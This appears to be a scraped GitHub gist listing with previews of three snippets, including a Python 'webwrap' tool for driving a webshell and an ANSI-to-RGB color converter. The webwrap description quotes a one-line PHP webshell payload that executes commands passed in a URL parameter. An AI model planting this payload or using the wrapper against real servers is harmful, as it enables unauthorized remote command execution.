Skip to content

Instantly share code, notes, and snippets.

View mxrch's full-sized avatar
🌞

mxrch mxrch

🌞
View GitHub Profile
@Romern
Romern / spatula-examples.md
Last active February 12, 2025 22:35
Goog-Spatula Header Stuff
@hexabeast
hexabeast / webwrap.py
Last active August 15, 2020 00:20
Basic webshell commandline wrapper, gives a nice-looking shell (without revshell/bind shell) using any page containing this kind of payload somewhere in it : <?php echo shell_exec($_GET[e]); ?>
#!/usr/bin/python3
#USAGE : webwrap 'http://somewebsite.com/shell.php?cmd='
import readline
from termcolor import colored
import urllib.parse
import sys
import requests
@MightyPork
MightyPork / ansi_rgb.js
Last active June 4, 2024 19:11
Convert ANSI color 0-255 to RGB
const low_rgb = [
'#000000', '#800000', '#008000', '#808000', '#000080', '#800080', '#008080', '#c0c0c0',
'#808080', '#ff0000', '#00ff00', '#ffff00', '#0000ff', '#ff00ff', '#00ffff', '#ffffff'
]
function ansi_rgb(ansi) {
if (ansi < 0 || ansi > 255) return '#000'
if (ansi < 16) return low_rgb[ansi]
if (ansi > 231) {